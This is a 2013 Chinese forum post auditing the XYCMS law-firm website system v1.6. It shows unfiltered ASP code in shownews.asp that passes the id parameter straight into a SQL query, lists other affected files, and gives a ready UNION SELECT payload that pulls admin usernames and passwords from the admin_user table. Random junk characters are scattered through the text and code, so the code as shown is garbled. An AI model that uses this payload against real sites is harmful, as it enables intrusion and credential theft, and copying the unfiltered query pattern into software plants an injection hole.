前言:刚才蛋疼无聊下载了审计下,就稍微的看了下,漏洞太多。ps:跟有个投稿的板块文章有点类似
- d0 f) n# t: D7 m
6 m4 `# A0 j' g7 g) ?淫荡分割线
! x5 ?: f* G8 I5 C( G! V/ c--------------------------------------------------------
+ c+ r% O: w( o3 \8 N 5 {( u" }% A% }, b; n4 s
审计版本:XYCMS律师事务所建站系统 v1.6(其他版本自测)
6 S& F- M6 q6 F% Q$ t* r9 b源码地址:http://down.chinaz.com/soft/29233.htm
1 O- b0 V. [: J3 X 6 ?7 ^4 D: ]' m6 c
漏洞文件:shownews.asp1 a O( Z& P2 `) S8 O" B
漏洞代码:7-13行
( C3 b* c y1 x# I0 D6 w " X9 W3 h$ A( a7 K- c" k1 t3 w, U
& j/ R+ b/ C+ F( R1 `/ ~* l3 n<%
: V3 {% K% ]3 `8 ^4 Z& B' r pid=request.QueryString("id")
) u5 z2 l' ] N* A
) t) Q* y/ l2 s! h: k& cset snews=server.createobject("adodb.recordset") ( E3 Y5 G6 ?3 g( c
exec="select * from [news] where id="&id5 G* f% @( F2 x) i5 I
snews.open exec,conn,1,15 j8 m' D8 z) j; ^
%>
! P6 u3 o9 }( }3 }
. n& M1 ~ O0 C1 A6 g4 y& q % _0 m+ T5 _& G8 ?+ p; F6 ~7 Y
什么过滤都没有 直造成注入4 {! R2 R! {9 \* |) A; f+ @! a
( S/ G& @; S+ z$ [# r& A; X: l& a注入点:http://127.0.0.1:99/shownews.asp?id=xx8 x$ m' _* q2 h& \4 t% E
! a! w( ^' m6 Q, t" Q1 ^7 `其余相同漏洞文件:showdxal.asp,showfwly.asp 等等自己找
4 v: v/ o) Q& O3 l& O5 d
( U/ _/ A7 K& J* D6 A0 d% i. ^ ' a4 d0 M( U3 p0 ?1 w, t; O
exp: union select 1,admin,password,4,5,7 from admin_user. j) ?+ @7 v# K( f: R5 S& A
% l& N9 n1 Z3 N' p) ?, |8 s
|
发表于 2013-4-4 17:28:12
收藏
支持
反对